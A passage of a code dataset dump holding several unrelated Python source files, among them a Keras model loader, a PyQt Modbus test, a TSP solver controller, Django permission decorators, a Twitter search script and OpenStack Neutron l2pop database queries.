\n\n","sub_path":"simpleinterface/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":16052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"38137469","text":"import os\n\nfrom exceptions import NoModelException\nfrom keras.models import model_from_json\nfrom exceptions.NoModelException import NoModelException\nfrom modules.utils import batch_size, models\nfrom os.path import lexists\nfrom modules.tcp_poster import TCPPoster\nimport tensorflow as tf\nimport keras.backend as K\n\n\n# global graph\n# graph = tf.get_default_graph()\n\nclass Loader(TCPPoster):\n def __init__(self):\n super().__init__()\n self.path = None\n self.response = \"Failed to load model\"\n self.load_path_cache = \"\"\n\n def load(self, num=1, model_dir=None):\n try:\n loaded_json = None\n\n if model_dir is None:\n path = self.path + \"/Model-\" + str(num) + \"/\"\n else:\n path = self.path + \"/\" + model_dir + \"/\"\n\n # path = str(path, 'utf-8')\n if not lexists(path):\n self.response = \"No such file or directory\"\n return None\n\n with open(path + \"/model.json\", 'r') as f:\n loaded_json = f.read()\n\n try:\n loaded_model = model_from_json(loaded_json)\n loaded_model.load_weights(path + '/w.h5', \"r\")\n except OSError:\n self.response = \"No such file or directory\"\n return None\n except ValueError:\n self.response = \"Wrong classifier's json\"\n return None\n\n loaded_model.compile(loss=\"binary_crossentropy\", optimizer='RMSprop', metrics=[\"accuracy\"])\n # Выгрузка батч сайза из первого слоя LSTM\n batch_size(loaded_model.get_input_shape_at(0)[0])\n\n self.response = \"200 OK\"\n return loaded_model\n except FileNotFoundError:\n self.response = \"File not found\"\n return None\n\n def set_req(self, req):\n self.req = req\n\n def load_models(self):\n try:\n if self.req is None:\n self.response = \"Request is None\"\n return None\n\n self.path = self.req['load_path'].replace('\\\\', '/')\n\n # Проверка, загружали ли мы данную модель, если да, то не загружаем ее опять\n if self.load_path_cache == self.path:\n self.response = \"These models are already loaded\"\n return None\n\n if os.path.exists(self.path):\n lst = os.listdir(self.path)\n for model_path in lst:\n if 'Model' in model_path:\n spl = model_path.split('-')\n num = spl[-1]\n # Сохраняем тензорфлоу граф рядом с моделью, которая относится к этому графу\n graph = tf.get_default_graph()\n model = self.load(model_dir=model_path)\n if model is not None:\n # Мапа : номер модели, кортеж (модель, ее граф)\n models(num, (model, graph))\n print(\"Loading model-\" + str(num))\n K.clear_session()\n else:\n return None\n self.load_path_cache = self.path\n self.response = \"200 OK\"\n else:\n self.response = \"File not found\"\n\n except FileNotFoundError:\n self.response = \"File not found\"\n return None\n","sub_path":"modules/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":3622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"213010153","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 12 00:36:37 2015\n\n@author: root\n\"\"\"\n\nimport sys\nimport os\nfrom PyQt4 import Qt, QtCore, QtGui\n\nsys.path.append(os.path.join(os.path.dirname(__file__), '../..'))\nfrom aware import *\nfrom data import *\nfrom hmi import *\nimport threading\n\nfrom communication import *\n#from provider import Provider\n#from modbusLink import ModbusLink\n\ncom2 = COMM(type=\"Modbus\",port='/dev/ttyACM0', adress=1)\n\napp = QtGui.QApplication(sys.argv) \nwindow = QtGui.QWidget()\n\ndial = Dial()\ndial.setRange(0,255)\n#dial.setScale(0,1.0,0.1)\n\nslider = Slider()\nslider.range(0,255)\n\nbotao = OnOffButton()\nbotao.textTrue = \"Ligado\"\nbotao.textFalse = \"Desligado\"\n\ntagSlider = Tag(Identity(0,\"TagSlider\"), 0, True)\nadaptador = AdapterContinuous(0,0,slider,\"value\",tagSlider,\"value\",3)\ntagSlider._adapter = adaptador\ntagSlider._scan = 0.1\ntagSlider.providerEnable = False\n\ntagGeradora2 = Tag()\ntagGeradora2._scan = 0.01\nadaptador2 = AdapterContinuous(0,0,tagGeradora2,\"value\",tagSlider,\"value\",4)\ntagGeradora2._adapter = adaptador2\ncomm2 = ModbusLink(board=com2, name=\"LedValor\",register=1)\ntagGeradora2.provider = comm2\n#tagGeradora2.attach(comm2)\ntagGeradora2.providerEnable = False\n\n\ntagGeradora3 = Tag()\ntagGeradora3._scan = 0.01\nadaptador3 = AdapterContinuous(0,0,dial,\"value\",tagGeradora3,\"value\",1)\ntagGeradora3._adapter = adaptador3\ncomm3 = ModbusLink(board=com2, name=\"LedValor\",register=1)\ntagGeradora3.provider = comm3\n#agGeradora3.attach(comm3)\ntagGeradora3.providerEnable = True\n\n\ntagBotao = Tag()\ntagBotao._scan = 0.0\ntagBotao._adapter = AdapterContinuous(0,0, botao,\"value\", tagBotao, \"value\", 3)\na =ModbusLink(board=com2, name=\"Boato\",register=0)\ntagBotao.provider = a\ntagBotao.providerEnable = False\n\nlayout = QtGui.QVBoxLayout()\nlayout.addWidget(dial)\nlayout.addWidget(slider)\nlayout.addWidget(botao)\n\nscan = Scan(0.1)\nscan.add(tagSlider)\nscan.add(tagGeradora2)\nscan.add(tagGeradora3)\nscan.add(tagBotao)\n\nGeradorThread = threading.Thread(target=scan.run, ) \nGeradorThread.setDaemon(True)\nGeradorThread.start()\n\nwindow.setLayout(layout)\nwindow.setGeometry(50,100,300,500)\nwindow.show()\n\n\n\nsys.exit(app.exec_()) ","sub_path":"olds/tests/communication/test08.py","file_name":"test08.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"590764371","text":"\"\"\"\nProject Euler Problem #4\nAuthor: Mohammed Fahad Kaleem\n\nTime:0.579291 seconds\n\nProblem:\n Find the largest palindrome made from the product of two 3-digit numbers.\n\nExample:\n A palindromic number reads the same both ways.\n The largest palindrome made from the product of two 2-digit numbers is 9009 = 91 × 99.\n\"\"\"\nimport time\n\n\nclass Solution(object):\n def largest_palindrome(self):\n max = 0\n for x in range(100,1000):\n for y in range(100,1000):\n product = x * y\n product_string = str(product)\n if self.is_palindrome(product_string):\n if product > max:\n max = product\n return max\n\n def is_palindrome(self, str):\n return str == str[::-1]\n\n\nif __name__ == \"__main__\":\n start = time.clock()\n solution = Solution().largest_palindrome()\n elapsed = time.clock() - start\n print(\"The largest palindrome made from the product of 3-digit numbers is: %s\"%solution)\n print(\"Time:%s seconds\" % elapsed)","sub_path":"Python/pe_004.py","file_name":"pe_004.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"564693403","text":"from denim.environment import EnvironmentCallableTask\n\n__all__ = ('deploy_env', )\n\n\ndef deploy_env(*args, **kwargs):\n \"\"\"\n Decorator declaring the wrapped function defines a deploy environment.\n\n May be invoked as a simple, argument-less decorator (i.e. ``@task``) or\n with arguments customizing its behavior (e.g. ``@task(alias='myalias')``).\n\n This decorator is essentially the same to the\n :ref:`new-style task ` see that decorator for details on\n how to use this decorator.\n\n \"\"\"\n invoked = bool(not args or kwargs)\n task_class = kwargs.pop(\"task_class\", EnvironmentCallableTask)\n if not invoked:\n func, args = args[0], ()\n\n def wrapper(func):\n return task_class(func, *args, **kwargs)\n\n return wrapper if invoked else wrapper(func)\n","sub_path":"denim/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"41895120","text":"'''\r\nCreated on Sep 7, 2017\r\n\r\n@author: Firklaag_xps\r\n'''\r\nimport wx\r\nimport math\r\nfrom TSP_MileStone_3.tsp_viewer_layer import TspGui, AdditionDialog\r\nfrom TSP_MileStone_3.tsp_model_layer import TspTableDAO, FileModel\r\nfrom TSP_MileStone_3.tsp_solver_module import TspSolver\r\n\r\nAUTHOR = \"Yan Wang\"\r\nALGORITHM = \"Simulated Annealing\"\r\n\r\nclass GuiController(object):\r\n \r\n def __init__(self):\r\n self.dao = TspTableDAO()\r\n self.file_reader = FileModel()\r\n self.solver = TspSolver()\r\n \r\n app = wx.App() \r\n self.gui = TspGui(self)\r\n self.gui.Show(show=True)\r\n app.MainLoop()\r\n #-----------------------------------------------------------------------------\r\n '''\r\n ADD. \r\n '''\r\n def add(self, event):\r\n ''' read the file '''\r\n path = self.gui.file_picker.GetPath()\r\n path = path.strip()\r\n \r\n if len(path) == 0:\r\n self.gui.updateStatusBar(\"Target file cannot be empty.\")\r\n return\r\n \r\n saver = self.file_reader.read_file(path)\r\n \r\n ''' check if exist '''\r\n if self.dao.tProblemExist(saver.name):\r\n self.gui.updateStatusBar(\"Problem %s exist.\" % saver.name)\r\n return\r\n else:\r\n ''' save problem in database'''\r\n self.dao.tProblemSave(saver.name, saver.dim, saver.comm)\r\n self.dao.tCitiesSave(saver.nodes)\r\n \r\n ''' display '''\r\n dot_x, dot_y = [], []\r\n for dot in saver.nodes:\r\n dot_x.append(dot[2])\r\n dot_y.append(dot[3])\r\n self.gui.manipulateDiagram(dot_x, dot_y, None, 0)\r\n \r\n ''' update ui '''\r\n self.update(\"ADD\", str(saver.name), str(saver.dim))\r\n self.gui.updateStatusBar(\"Add cities %s success.\" % saver.name)\r\n #------------------------------------------------------------------------------\r\n '''\r\n SOLVE\r\n '''\r\n def solve(self, event):\r\n ''' gather the parameters '''\r\n problem = self.gui.list_prob.GetStringSelection()\r\n if len(problem) == 0:\r\n self.gui.updateStatusBar(\"Please select a problem.\")\r\n return\r\n problem = problem.split(\"|\")[0].strip()\r\n isSave = self.gui.is_save.IsChecked()\r\n maximum_time = int(self._showDialog())\r\n if maximum_time == 0:\r\n return\r\n \r\n ''' load the problem '''\r\n nodesList = self.dao.tCitiesFindAll(problem)\r\n tsp_map = self.built(nodesList)\r\n self.gui.updateStatusBar(\"Problem map built complete, please wait for %s seconds\" % maximum_time)\r\n \r\n ''' solve problem '''\r\n dot_x, dot_y = [], []\r\n for dot in nodesList:\r\n dot_x.append(dot[0])\r\n dot_y.append(dot[1])\r\n self.gui.manipulateDiagram(dot_x, dot_y, None, 0)\r\n \r\n# threading.Timer(0, self._showProgressBar, [maximum_time]).start()\r\n \r\n tourLen, tour = self.solver.solver(tsp_map, maximum_time)\r\n tour = [i + 1 for i in tour]\r\n \r\n self.gui.updateStatusBar(\"Operation complete! current best tour length is %s.\" % tourLen)\r\n self.gui.manipulateDiagram(dot_x, dot_y, tour, 0.1)\r\n \r\n ''' save the problem or not '''\r\n if isSave:\r\n tour = [str(i) for i in tour]\r\n tour.append(\"-1\")\r\n d_tour = \" \".join(tour)\r\n self.dao.tSolutionSave(problem, tourLen, AUTHOR, ALGORITHM, maximum_time, d_tour)\r\n self.gui.updateStatusBar(\"Save current solution into database.\")\r\n \r\n ''' update gui '''\r\n self.update(\"CON\", ALGORITHM, AUTHOR)\r\n #------------------------------------------------------------------------------\r\n '''\r\n FETCH\r\n '''\r\n def fetch(self, event):\r\n ''' gather the parameters '''\r\n problem = self.gui.list_prob.GetStringSelection()\r\n if len(problem) == 0:\r\n self.gui.updateStatusBar(\"Please select a problem.\")\r\n return\r\n problem = problem.split(\"|\")[0].strip()\r\n \r\n shorestModel = self.gui.is_shortest.IsChecked()\r\n \r\n author, algorithm = \"\",\"\"\r\n \r\n if self.gui.author_choice.GetSelection() != 0:\r\n author = self.gui.author_choice.GetStringSelection().strip()\r\n \r\n if self.gui.algo_choice.GetSelection() != 0:\r\n algorithm = self.gui.algo_choice.GetStringSelection().strip()\r\n \r\n ''' read data '''\r\n nodesList = self.dao.tCitiesFindAll(problem)\r\n solution = self.fetchSolution(problem, shorestModel, author, algorithm)\r\n if solution is None:\r\n self.gui.updateStatusBar(\"No current solution for %s\" % problem)\r\n return\r\n \r\n tour = solution.tour \r\n self.gui.updateStatusBar(solution.toString())\r\n ''' display '''\r\n dot_x, dot_y = [], []\r\n for dot in nodesList:\r\n dot_x.append(dot[0])\r\n dot_y.append(dot[1])\r\n self.gui.manipulateDiagram(dot_x, dot_y, tour, 0.1)\r\n #-------------------------------------------------------------------------------------------------\r\n \r\n def fetchSolution(self, problem, shorestModel, author, algorithm):\r\n sql = \"select * from Solution where ProblemName = '%s' \" % problem\r\n \r\n if author != \"\": sql += \"and Author = '%s' \" % author\r\n \r\n if algorithm != \"\": sql += \"and Algorithm = '%s' \" % algorithm\r\n \r\n if shorestModel: sql += \"order by TourLength;\"\r\n else: sql += \"order by Date;\"\r\n \r\n return self.dao.tSolutionFind(sql)\r\n #--------------------------------------------------------------------------------------------------\r\n \r\n def update(self, element, *item):\r\n if element == 'ADD':\r\n self.gui.updateListBox(self._tspFormat(item[0], item[1]))\r\n if element == 'CON':\r\n self.gui.updateCondition(item[0], item[1])\r\n #----------------------------------------------------------------------------------------------------\r\n \r\n def fetchTspList(self):\r\n problems = []\r\n rows = self.dao.tProblemFinadAll()\r\n for l in rows:\r\n problems.append(self._tspFormat(str(l[0]), str(l[1])))\r\n return problems\r\n #---------------------------------------------------------------------------------------------------\r\n \r\n def fetchAut_AlgList(self):\r\n algorithms = [u\"-- SELECT ALGORITHM --\"]\r\n authors = [u\"-- SELECT AUTHOR --\"]\r\n \r\n al_rows = self.dao.tSolutionGroupByAlgorithm()\r\n au_rows = self.dao.tSolutionGroupByAuthor()\r\n \r\n for al in al_rows:\r\n algorithms.append(u\"%s\" % al[0])\r\n for au in au_rows:\r\n authors.append(u\"%s\" % au[0]) \r\n \r\n return algorithms, authors\r\n #---------------------------------------------------\r\n# def _showProgressBar(self, timeCost):\r\n# bar = ProgressBar(timeCost)\r\n# bar.progess()\r\n \r\n def _showDialog(self):\r\n dialog = AdditionDialog()\r\n result = dialog.ShowModal()\r\n timeCost = 0\r\n if result == wx.ID_OK:\r\n timeCost = dialog.timeCost.GetValue()\r\n \r\n dialog.Destroy()\r\n return timeCost\r\n #-----------------------------------------------------------------------------------------------------------------\r\n def _tspFormat(self, name, size):\r\n name = name.strip()\r\n size = size.strip()\r\n return u\"%s | (Size: %s)\" % (name.ljust(12), size.center(5))\r\n #-----------------------------------------------------------------------------------------------------------------\r\n \r\n ''' return the distance between two points'''\r\n def _dist(self, p_1, p_2):\r\n return math.sqrt((p_2[0] - p_1[0]) ** 2 + (p_2[1] - p_1[1]) ** 2) \r\n #-----------------------------------------------------------------------------------------------------------------\r\n \r\n ''' bulit the map. get the distance every node to each others '''\r\n def built(self, nodes):\r\n dim = len(nodes)\r\n tsp_map = dict()\r\n print(\"LOG -- Start to build distance map, dimension:\", dim)\r\n print(\"WARNING -- If the dimension is too large, it could take a while.\")\r\n for i in range(dim):\r\n dists = []\r\n for j in range(dim):\r\n dists.append(round(self._dist(nodes[i], nodes[j]), 1))\r\n tsp_map[i] = dists\r\n return tsp_map \r\n #------------------------------------------------------------------------------------------------------------------","sub_path":"1810ICT_SDP_Assignment/TSP_MileStone_3/tsp_controller_layer.py","file_name":"tsp_controller_layer.py","file_ext":"py","file_size_in_byte":8688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"336718374","text":"# -*- coding: utf-8 -*-\n\nfrom django.http import HttpResponse\nfrom django.core.urlresolvers import reverse\nfrom django.utils.encoding import force_str\nfrom django.contrib.auth import REDIRECT_FIELD_NAME\n\nfrom adminpanel.models import Permission\nfrom account.models import Userdetail\nfrom ucenter.models import UserValidate\n\nimport json\n\n# from pprint import pprint\n\n\ndef loginRequired(func=None, redirect_field_name=REDIRECT_FIELD_NAME):\n def _deco(request, *arg, **kwargs):\n if request.user.is_authenticated():\n return func(request, *arg, **kwargs)\n\n path = request.get_full_path()\n adminLoginUrl = force_str(reverse('adminpanel_login'))\n\n from django.contrib.auth.views import redirect_to_login\n return redirect_to_login(\n path, adminLoginUrl, redirect_field_name)\n\n return _deco\n\n\ndef sysPermission(module, action, redirect_field_name=REDIRECT_FIELD_NAME):\n def _handler(func):\n def _deco(request, *arg, **kwargs):\n\n # 用户未登录\n if not request.user.is_authenticated():\n path = request.get_full_path()\n adminLoginUrl = force_str(reverse('adminpanel_login'))\n\n from django.contrib.auth.views import redirect_to_login\n return redirect_to_login(\n path, adminLoginUrl, redirect_field_name)\n\n perm = Permission.objects.filter(module=module, action=action)\n perm = perm.get() if perm else None\n\n uv = UserValidate.objects.get(user=request.user)\n ud = Userdetail.objects.get(uservalidate=uv)\n userPerms = ud.group.permissions.all()\n if perm and perm in userPerms:\n return func(request, *arg, **kwargs)\n\n from adminpanel.views import error\n if action == 'index':\n return error(request, {'error': \"您没有权限这么做!\", 'url': '/'})\n else:\n return error(request, {'error': \"您没有权限这么做!\"})\n return _deco\n return _handler\n\n\ndef sysPermissionAJAX(module, action):\n def _handler(func):\n def _deco(request, *arg, **kwargs):\n\n # 用户未登录\n if not request.user.is_authenticated():\n return HttpResponse(json.dumps({'status': False, 'message': \"您尚未登录!\"}))\n\n perm = Permission.objects.filter(module=module, action=action)\n perm = perm.get() if perm else None\n\n uv = UserValidate.objects.get(user=request.user)\n ud = Userdetail.objects.get(uservalidate=uv)\n userPerms = ud.group.permissions.all()\n if perm and perm in userPerms:\n return func(request, *arg, **kwargs)\n\n return HttpResponse(json.dumps({'status': False, 'message': \"您没有权限这么做!\"}))\n\n return _deco\n return _handler\n","sub_path":"wizcloud/adminpanel/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"615666846","text":"import requests\nfrom requests_oauthlib import OAuth1\nimport json\n\nfrom api_keys import *\n\nurl = 'https://api.twitter.com/1.1/search/tweets.json'\nauth = OAuth1(TWITTER_CONSUMER_KEY, TWITTER_CONSUMER_SECRET,\n TWITTER_TOKEN, TWITTER_TOKEN_SECRET)\n\ndef get_tweets(query_text, count):\n url_query = url + '?q=' + query_text + '&count=' + str(count)\n response = requests.get(url_query, auth=auth)\n\n tweet_list = []\n if response.status_code == requests.codes.ok:\n data = json.loads(response.text)\n for tweet in data['statuses']:\n tweet_list.append('@' + tweet['user']['screen_name'] + ': ' + tweet['text'])\n\n return tweet_list\n\nprint (get_tweets('hackbright', 10))\n\n","sub_path":"ch15/tweets.py","file_name":"tweets.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"289971999","text":"from dataclasses import dataclass\nimport re\nfrom app.configs.database import db\nfrom app.exceptions.shipping_company_exc import InvalidKeysError, InvalidTypeError, ShippingCompanyNotFound, InvalidCnpjFormatError\nfrom app.services.helper import DefaultModel\nfrom sqlalchemy import Column, Float, Integer, String\nfrom sqlalchemy.orm import validates\n\n\n@dataclass\nclass ShippingCompanyModel(db.Model, DefaultModel):\n\n name: str\n cnpj: str\n rate: str\n \n\n __tablename__ = 'shipping_companies'\n\n shipping_company_id = Column(Integer, primary_key=True)\n name = Column(String(127), nullable=False)\n cnpj = Column(String(100), nullable=False, unique=True)\n rate = Column(Float)\n minimum_shipping_price = Column(Integer, default=0)\n\n\n @validates('name')\n def validate_string_type(self, key, value):\n if type(value) != str:\n raise InvalidTypeError(f'{key} must be a string type.')\n\n return value\n\n @validates('cnpj')\n def validate_cnpj_pattern(self, key, value):\n if type(value) != str:\n raise InvalidTypeError(f'{key} must be a string type.')\n\n string = value\n pattern = '\\d{2}\\.\\d{3}\\.\\d{3}\\/\\d{4}\\-\\d{2}'\n\n if not re.fullmatch(pattern, string):\n raise InvalidCnpjFormatError(\"Invalid cnpj format. Valid format: '00.000.000/0000-00'\")\n\n return value\n\n @validates('rate')\n def validate_rate_type(self, key, value):\n if type(value) != float:\n raise InvalidTypeError(f'{key} must be a float type.')\n\n return value\n\n def update(self, data):\n try:\n ShippingCompanyModel(**data)\n except TypeError:\n keys = ('name', 'cnpj', 'rate')\n raise InvalidKeysError(f\"Invalid Keys in body. Accepted Keys:{', '.join(keys)}\")\n\n for key, value in data.items():\n setattr(self, key, value)\n \n self.save_self()\n\n @staticmethod\n def shipping_company_verify(shipping_company_id):\n shipping_company: ShippingCompanyModel = ShippingCompanyModel.query.get(shipping_company_id)\n\n if not shipping_company:\n raise ShippingCompanyNotFound('Shipping company not found.')\n\n return shipping_company\n","sub_path":"app/models/shipping_company_model.py","file_name":"shipping_company_model.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"582283809","text":"import threads\n\nclass Controller:\n\n def __init__(self):\n self.mangasFound = []\n self.chaptersFound = []\n\n self.threadOnRunMangas = threads.OnRunMangas()\n self.threadOnRunMangas.sendData.connect(self.updateListManga)\n self.threadOnRunMangas.started.connect(self.searchStarted)\n self.threadOnRunMangas.finished.connect(self.searchFinished)\n\n self.threadOnRunChapters = threads.OnRunChapters()\n self.threadOnRunChapters.sendData.connect(self.updateListChapter)\n\n self.threadOnRunPages = threads.OnRunPages()\n self.threadOnRunPages.started.connect(self.downloadStarted)\n self.threadOnRunPages.finished.connect(self.downloadFinished)\n \n def setupUi(self, ui):\n self.ui = ui\n\n def updateListManga(self, data):\n self.ui.listWidgetManga.clear()\n if len(data) != 0:\n \n self.mangasFound.clear()\n self.mangasFound.extend(data)\n \n for i in data:\n self.ui.listWidgetManga.addItem(i.__str__())\n self.ui.buttonChapters.setEnabled(True)\n else:\n self.ui.showMessage('oops', 'Nenhum manga encontrado!')\n\n def updateListChapter(self, data):\n self.ui.listWidgetChapter.clear()\n if len(data) != 0:\n \n self.chaptersFound.clear()\n self.chaptersFound.extend(data)\n\n for i in data:\n self.ui.listWidgetChapter.addItem(i.__str__())\n \n self.chapterFinished()\n\n else:\n self.ui.showMessage('oops', 'Nenhum capitulo encontrado!')\n\n def searchManga(self):\n\n if self.emptyTextSearch():\n self.ui.buttonChapters.setEnabled(False)\n self.threadOnRunMangas.load(self.ui.textSearch.toPlainText())\n self.threadOnRunMangas.start()\n else:\n self.ui.showMessage('Ei', 'Digite algo antes!')\n\n def searchChapter(self):\n item = self.ui.listWidgetManga.selectedItems()\n if len(item) != 0:\n itemSearch = self.mangasFound[self.ui.listWidgetManga.currentRow()]\n self.threadOnRunChapters.load(itemSearch)\n self.threadOnRunChapters.OnChapters()\n \n def selectAll(self):\n self.ui.listWidgetChapter.selectAll()\n\n def download(self):\n if len(self.ui.listWidgetChapter.selectedItems()) == 0: return\n\n si = self.ui.listWidgetChapter.selectedIndexes()\n tempList = []\n for i in si:\n tempList.append(self.chaptersFound[i.row()])\n\n self.threadOnRunPages.load(tempList)\n self.threadOnRunPages.start()\n\n def setProgress(self, value):\n self.threadOnRunPages.update.connect(value)\n\n def searchStarted(self):\n self.ui.buttonSearch.setEnabled(False)\n \n def searchFinished(self):\n self.ui.buttonSearch.setEnabled(True)\n \n def downloadStarted(self):\n self.ui.buttonDownload.setEnabled(False)\n\n def downloadFinished(self):\n self.ui.buttonDownload.setEnabled(True)\n self.ui.showMessage('Manga', 'Download Completo!')\n\n def chapterFinished(self):\n self.ui.buttonSelectAll.setEnabled(True)\n self.ui.buttonDownload.setEnabled(True)\n\n def emptyTextSearch(self):\n return self.ui.textSearch.toPlainText() != ''\n","sub_path":"Code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"475945744","text":"# Copyright (c) 2013 OpenStack Foundation.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom neutron_lib import constants as const\nfrom oslo_serialization import jsonutils\nfrom oslo_utils import timeutils\n\nfrom neutron.db.models import agent as agent_model\nfrom neutron.db.models import l3ha as l3ha_model\nfrom neutron.db import models_v2\nfrom neutron.plugins.ml2 import models as ml2_models\n\n\nHA_ROUTER_PORTS = (const.DEVICE_OWNER_HA_REPLICATED_INT,\n const.DEVICE_OWNER_ROUTER_SNAT)\n\n\ndef get_agent_ip_by_host(session, agent_host):\n agent = get_agent_by_host(session, agent_host)\n if agent:\n return get_agent_ip(agent)\n\n\ndef get_agent_ip(agent):\n configuration = jsonutils.loads(agent.configurations)\n return configuration.get('tunneling_ip')\n\n\ndef get_agent_uptime(agent):\n return timeutils.delta_seconds(agent.started_at,\n agent.heartbeat_timestamp)\n\n\ndef get_agent_tunnel_types(agent):\n configuration = jsonutils.loads(agent.configurations)\n return configuration.get('tunnel_types')\n\n\ndef get_agent_l2pop_network_types(agent):\n configuration = jsonutils.loads(agent.configurations)\n return configuration.get('l2pop_network_types')\n\n\ndef get_agent_by_host(session, agent_host):\n \"\"\"Return a L2 agent on the host.\"\"\"\n\n with session.begin(subtransactions=True):\n query = session.query(agent_model.Agent)\n query = query.filter(agent_model.Agent.host == agent_host)\n for agent in query:\n if get_agent_ip(agent):\n return agent\n\n\ndef _get_active_network_ports(session, network_id):\n with session.begin(subtransactions=True):\n query = session.query(ml2_models.PortBinding, agent_model.Agent)\n query = query.join(agent_model.Agent,\n agent_model.Agent.host == ml2_models.PortBinding.host)\n query = query.join(models_v2.Port)\n query = query.filter(models_v2.Port.network_id == network_id,\n models_v2.Port.status == const.PORT_STATUS_ACTIVE)\n return query\n\n\ndef _ha_router_interfaces_on_network_query(session, network_id):\n query = session.query(models_v2.Port)\n query = query.join(l3ha_model.L3HARouterAgentPortBinding,\n l3ha_model.L3HARouterAgentPortBinding.router_id ==\n models_v2.Port.device_id)\n return query.filter(\n models_v2.Port.network_id == network_id,\n models_v2.Port.device_owner.in_(HA_ROUTER_PORTS))\n\n\ndef _get_ha_router_interface_ids(session, network_id):\n query = _ha_router_interfaces_on_network_query(session, network_id)\n return query.from_self(models_v2.Port.id).distinct()\n\n\ndef get_nondistributed_active_network_ports(session, network_id):\n query = _get_active_network_ports(session, network_id)\n # Exclude DVR and HA router interfaces\n query = query.filter(models_v2.Port.device_owner !=\n const.DEVICE_OWNER_DVR_INTERFACE)\n ha_iface_ids_query = _get_ha_router_interface_ids(session, network_id)\n query = query.filter(models_v2.Port.id.notin_(ha_iface_ids_query))\n return [(bind, agent) for bind, agent in query.all()\n if get_agent_ip(agent)]\n\n\ndef get_dvr_active_network_ports(session, network_id):\n with session.begin(subtransactions=True):\n query = session.query(ml2_models.DistributedPortBinding,\n agent_model.Agent)\n query = query.join(agent_model.Agent,\n agent_model.Agent.host ==\n ml2_models.DistributedPortBinding.host)\n query = query.join(models_v2.Port)\n query = query.filter(models_v2.Port.network_id == network_id,\n models_v2.Port.status == const.PORT_STATUS_ACTIVE,\n models_v2.Port.device_owner ==\n const.DEVICE_OWNER_DVR_INTERFACE)\n return [(bind, agent) for bind, agent in query.all()\n if get_agent_ip(agent)]\n\n\ndef get_distributed_active_network_ports(session, network_id):\n return (get_dvr_active_network_ports(session, network_id) +\n get_ha_active_network_ports(session, network_id))\n\n\ndef get_ha_active_network_ports(session, network_id):\n agents = get_ha_agents(session, network_id=network_id)\n return [(None, agent) for agent in agents]\n\n\ndef get_ha_agents(session, network_id=None, router_id=None):\n query = session.query(agent_model.Agent.host).distinct()\n query = query.join(l3ha_model.L3HARouterAgentPortBinding,\n l3ha_model.L3HARouterAgentPortBinding.l3_agent_id ==\n agent_model.Agent.id)\n if router_id:\n query = query.filter(\n l3ha_model.L3HARouterAgentPortBinding.router_id == router_id)\n elif network_id:\n query = query.join(models_v2.Port, models_v2.Port.device_id ==\n l3ha_model.L3HARouterAgentPortBinding.router_id)\n query = query.filter(models_v2.Port.network_id == network_id,\n models_v2.Port.status == const.PORT_STATUS_ACTIVE,\n models_v2.Port.device_owner.in_(HA_ROUTER_PORTS))\n else:\n return []\n # L3HARouterAgentPortBinding will have l3 agent ids of hosting agents.\n # But we need l2 agent(for tunneling ip) while creating FDB entries.\n agents_query = session.query(agent_model.Agent)\n agents_query = agents_query.filter(agent_model.Agent.host.in_(query))\n return [agent for agent in agents_query\n if get_agent_ip(agent)]\n\n\ndef get_ha_agents_by_router_id(session, router_id):\n return get_ha_agents(session, router_id=router_id)\n\n\ndef get_agent_network_active_port_count(session, agent_host,\n network_id):\n with session.begin(subtransactions=True):\n query = session.query(models_v2.Port)\n query1 = query.join(ml2_models.PortBinding)\n query1 = query1.filter(models_v2.Port.network_id == network_id,\n models_v2.Port.status ==\n const.PORT_STATUS_ACTIVE,\n models_v2.Port.device_owner !=\n const.DEVICE_OWNER_DVR_INTERFACE,\n ml2_models.PortBinding.host == agent_host)\n\n ha_iface_ids_query = _get_ha_router_interface_ids(session, network_id)\n query1 = query1.filter(models_v2.Port.id.notin_(ha_iface_ids_query))\n ha_port_count = get_ha_router_active_port_count(\n session, agent_host, network_id)\n\n query2 = query.join(ml2_models.DistributedPortBinding)\n query2 = query2.filter(models_v2.Port.network_id == network_id,\n ml2_models.DistributedPortBinding.status ==\n const.PORT_STATUS_ACTIVE,\n models_v2.Port.device_owner ==\n const.DEVICE_OWNER_DVR_INTERFACE,\n ml2_models.DistributedPortBinding.host ==\n agent_host)\n return (query1.count() + query2.count() + ha_port_count)\n\n\ndef get_ha_router_active_port_count(session, agent_host, network_id):\n # Return num of HA router interfaces on the given network and host\n query = _ha_router_interfaces_on_network_query(session, network_id)\n query = query.filter(models_v2.Port.status == const.PORT_STATUS_ACTIVE)\n query = query.join(agent_model.Agent)\n query = query.filter(agent_model.Agent.host == agent_host)\n return 